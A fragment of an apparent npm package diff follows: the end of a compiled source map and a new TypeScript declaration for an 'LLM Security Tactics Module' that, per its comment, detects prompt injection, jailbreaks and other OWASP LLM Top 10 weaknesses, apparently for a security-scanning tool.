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"}

package/dist/agents/adversary/tactics/llm.d.ts

@@ -0,0 +1,13 @@
+/**
+ * LLM Security Tactics Module
+ *
+ * Detects LLM/AI security vulnerabilities aligned with OWASP LLM Top 10 including
+ * prompt injection, jailbreaks, plugin abuse, excessive agency, and sensitive disclosure.
+ * Priority 3 - emerging attack surface for AI-powered applications.
+ *
+ * @module agents/adversary/tactics/llm
+ */
+import type { TacticModule } from "./index.js";
+declare const llmTactic: TacticModule;
+export { llmTactic };
+//# sourceMappingURL=llm.d.ts.map

package/dist/agents/adversary/tactics/llm.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"llm.d.ts","sourceRoot":"","sources":["../../../../src/agents/adversary/tactics/llm.ts"],"names":[],"mappings":"AAAA;;;;;;;;GAQG;AAGH,OAAO,KAAK,EACV,YAAY,EAIb,MAAM,YAAY,CAAC;AA2OpB,QAAA,MAAM,SAAS,EAAE,YAgKhB,CAAC;AA2aF,OAAO,EAAE,SAAS,EAAE,CAAC"}